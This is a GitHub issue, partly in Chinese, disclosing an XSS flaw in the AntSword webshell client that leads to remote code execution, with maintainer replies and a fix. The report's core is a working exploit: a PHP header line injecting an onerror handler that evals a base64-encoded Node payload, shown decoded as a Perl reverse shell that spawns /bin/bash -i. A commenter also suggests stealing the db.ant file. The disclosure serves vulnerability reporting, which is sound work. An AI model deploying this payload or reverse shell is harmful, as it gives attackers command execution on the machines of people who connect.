Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
想交某VE,所以下面就用英文先写了 When i connect to my webshell by antsword.If the connection fails, antSword will echo error information. like this this information don't have xss protect,so i can xss and execute system command My poc
<?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>');
My exp (for perl)
<?php header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'>"); ?>
base64_decode code
require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
getshell
~/source/modules/filemanage/index.js 206
toastr.error((err instanceof Object) ? JSON.stringify(err) : String(err), LANG_T['error']);
add xss protect
The text was updated successfully, but these errors were encountered:
感谢。为了防止插件中 toastr 出现类似问题, 修改了 toastr 可以输出 html 的特点,以后均不支持输出 html。
Sorry, something went wrong.
37f871b
这个有点屌,RCE呀。
感觉这种程序架构比较容易出现xss rce遗漏,要不将任何从客户端来的的数据进行一次统一的encode过滤
刺激
@ViCrack 这个也是在输出的时候疏忽导致的,UI框架中用到的库不尽相同,比如 dhtmlx 中 grid,tree 都会在输出前编码一次,而 toastr 本就是输出 html 的,所以一刀切不是个好办法。
不过 这个利用起来 需要时间竞争 话说倒是可以读取db.ant 发送到远程 全部拿走 哈哈哈哈
No branches or pull requests
想交某VE,所以下面就用英文先写了

When i connect to my webshell by antsword.If the connection fails, antSword will echo error information.
like this
this information don't have xss protect,so i can xss and execute system command
My poc
My exp (for perl)
base64_decode code
getshell

~/source/modules/filemanage/index.js 206
add xss protect
The text was updated successfully, but these errors were encountered: